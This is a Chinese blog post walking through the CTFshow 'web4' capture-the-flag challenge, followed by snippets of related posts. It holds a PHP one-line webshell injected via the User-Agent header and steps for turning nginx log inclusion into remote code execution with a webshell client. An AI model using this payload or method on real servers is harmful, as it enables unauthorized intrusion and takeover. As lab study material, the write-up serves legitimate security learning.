CTFSHOW web4

已于 2023-10-08 20:55:45 修改
阅读量249 收藏
点赞数
分类专栏: ctf 文章标签: 网络安全
于 2023-10-08 20:45:32 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hac1ker123/article/details/133689376
版权

1.进来看题为   文件包含。

日志包含然后使用webshell工具,这里我用的是哥斯拉进行getshell

然后查看消息头--》网络--》

Server

nginx/1.18.0 (Ubuntu)

2.服务器为Ubuntu,服务为nginx。

nginx的日志文件在/var/log/nginx/access.log和error.log中

其中access.log文件是可以打开的。

在url中加入?url=/var/log/nginx/access.log。

3.下一步进行抓包,写入一句话木马。

这里url中是无法写入的,写入后会出现400 Bad Request

只能在参数里面进行写入。

当出现界面刷新时表示getshell。

在User-Agent代理中写入一句话木马。

<?php eval($_POST['A']);?>

然后用webshell工具连接。

这里我用的是哥斯拉。

输入url,这里的密码为A,最后getshell 。

出现这个界面表示连接成功了,然后在文件管理中找到flag.txt就能看到flag了。

clayboy1
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
ctfshow web139命令盲注脚本
10-21
ctfshow靶场 web入门 web139 命令盲注脚本
ctf.show_web4
Kavint的博客
04-20 548
F12打开网络栏,可以看到Server里面是nginx,尝试一下日志注入。用Burp Suite抓包,在User-Agent后面写个🐎。注意URL地址写的是日志地址,因为我们的🐎是传进日志里了。此时木马已经插入进去了,日志中的代码会被执行但不会显示。($_GET['url'])可看出存在文件包含漏洞。放包,注意看日志下面这时多出来一条。nginx服务器默认日志位置在。在上层可以看到flag.txt。在url后面输入查看一下。
ctfshow-WEB-web4
热门推荐
wangyuxiang946的博客
08-20 1万+
ctf.show WEB模块第4关是一个文件包含漏洞,页面提示了源码中的关键代码,使用include()函数接收url参数,include()函数包含的文件会被执行,从而造成任意代码执行,或者配合伪协议获取敏感文件甚至getshell; 然而这一关伪协议不起作用,我们可以通过日志注入进行任意命令执行,从而getshell 页面最明显的位置展示了源码的核心,提示我们利用文件包含漏洞 包含日志文件,查看日志文件的信息,可以看到日志文件中保存了网站的访问记录,包括HTTP请求行...
CTFSHOW 萌新 web4 解题思路和方法
最新发布
weixin_58052886的博客
06-27 364
需要蓄意的是,题目使用intval()函数进行整形转换。在转换整数类型时,如果被转换的是整数类型,则会直接原样转换;如果是字符串类型,则会从第一个字符开始转换,直到遇到非整数类型的字符才会停止;使用逻辑运算符 ||进行测试,发现成功获取的到flag。首先使用 union 进行测试,发现报错。
ctfshow-web4(文件包含&日志注入)
Welcome To Myon'Blog !
10-08 1325
Nginx中的日志分两种,一种是error.log,一种是access.log。中间件的日志文件会保存网站的访问记录,比如HTTP请求行,User-Agent,Referer等客户端信息,如果在HTTP请求中插入恶意代码,那么恶意代码就会保存到日志文件中,访问日志文件的时候,日志文件中的恶意代码就会执行,从而造成任意代码执行甚至获取shell。对于Ngnix,日志存放路径:/var/log/nginx/access.log 和 /var/log/nginx/error.log。进入后台,找到flag。
CTFshow web4 详解
lzu_lfl的博客
10-15 2432
日志写码getshell
ctfshow-web4
HAI_WD的博客
08-04 625
默认nginx日志是:/var/log/nginx/access.log,可以看到记录了请求。那么我们就可以修改ua头进行代码注入,如果存在ssh连接的话,用ssh日志也可以。然后cat一下获取到flag。
ctfshow web184 正则爆破脚本0x16进制
10-21
ctfshow web184 正则爆破脚本0x16进制
ctfshow web214 时间盲注标准脚本
10-21
ctfshow web214 时间盲注标准脚本
CTFSHOW web183 正则爆破脚本
10-21
CTFSHOW web183 正则爆破脚本
CTFSHOW web193 left标注盲注脚本
05-04
这段代码是一个用于获取某个网站的 flag 的脚本。它使用了 SQL 注入漏洞来获取 flag。具体来说,它通过构造 SQL 语句的方式,逐个字符地获取 flag。其中,它通过修改注入语句中的 payload 变量,来获取不同的信息,...
最新ctfshow-WEB-web4_ctf,网络安全工程师面试题目和答案
2401_84264096的博客
05-13 932
页面最明显的位置展示了源码的核心,提示我们利用文件包含漏洞包含日志文件,查看日志文件的信息,可以看到日志文件中保存了网站的访问记录,包括HTTP请求行,Referer,User-Agent等HTTP请求的信息使用代理工具(Burp Suite)抓包,在User-Agent中插入一句话木马很明显,日志文件的内容多了一条访问记录,但没有我们插入的一句话木马,这很正常,因为日志文件中的代码会被执行,而不会显示我们使用蚁剑链接日志文件的路径,getshell。
ctfshow.web4
weixin_71543329的博客
12-23 419
日志文件会保存网站的访问记录,比如HTTP请求行,User-Agent,Referer等客户端信息,如果在HTTP请求中插入恶意代码,那么恶意代码就会保存到日志文件中,访问日志文件的时候,日志文件中的恶意代码就会执行,从而造成任意代码执行甚至获取shell。2.同web3一样先使用php伪协议,php://input 发现会被过滤掉,换成PHp这种不行,应该被过滤掉了,所以使用别的方法考虑。日志路径:/var/log/nginx/access.log和 /var/log/nginx/error.log。
ctfshow web4
stantic的博客
05-09 1582
提示日志注入,文件包含;还有一个get方式的参数url, 有nginx,那就试试它的默认日志目录 日志默认路径: (1) apache+Linux 日志默认路径 /etc/httpd/logs/access_log /var/log/httpd/access_log (2) apache+win2003 日志默认路径 D:\xampp\apache\l...
2024年最新synchronized与单例的线程安全问题,2024年最新字节跳动网络安全三面凉凉
2301_82242964的博客
05-06 255
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!内容实在太多,不一一截图了。
CTFshow---WEB入门---web4
qq_43752749的博客
12-11 544
提示我们查看flagishere.txt。提示我们关注robots.txt文件。我们访问robots.txt文件。查看该文件获得flag。
有了这个网络安全面试题,面试就像开了挂!(附PDF)
lvaolan的博客
02-26 702
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!​​​​内容实在太多,不一一截图了。
CTFShow Web4
qq_62566956的博客
03-27 325
robots.txt文件是一个文本文件,使用任何一个常见的文本编辑器,比如Windows系统安装了Notepad,就可以创建和编辑它 [1]。robots.txt是一个协议,而不是一个命令。robots.txt是搜索引擎中访问网站的时候要查看的第一个文件。robots.txt文件告诉蜘蛛程序在服务器上什么文件是可以被查看的。总有人把后台地址写入robots,帮黑阔大佬们引路。
ctfshow web 41
08-20
根据引用,ctfshow web 41 是一个命令盲注脚本,它属于ctfshow靶场的web入门系列。根据引用,这个脚本可能存在一些问题,所以如果你有任何问题,可以向ctfshow web 41的作者提问。根据引用,在ctfshow web 41的实现...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值